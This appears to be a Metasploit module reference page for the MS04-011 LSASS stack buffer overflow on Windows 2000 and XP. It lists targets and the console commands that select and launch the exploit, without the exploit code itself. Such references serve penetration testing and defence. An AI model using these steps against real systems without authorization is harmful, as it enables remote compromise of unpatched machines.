MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
This module exploits a stack buffer overflow in the LSASS service. The vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need to run this module twice. DCERPC request fragmentation can be performed by setting the 'FragSize' parameter.
- hdm <x [at] hdm.io>
- Automatic Targetting
- Windows 2000 English
- Windows XP English
To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':
msf > use exploit/windows/smb/ms04_011_lsass
msf exploit(ms04_011_lsass) > show targets
    ...targets...
msf exploit(ms04_011_lsass) > set TARGET <target-id>
msf exploit(ms04_011_lsass) > show options
    ...show and set options...
msf exploit(ms04_011_lsass) > exploit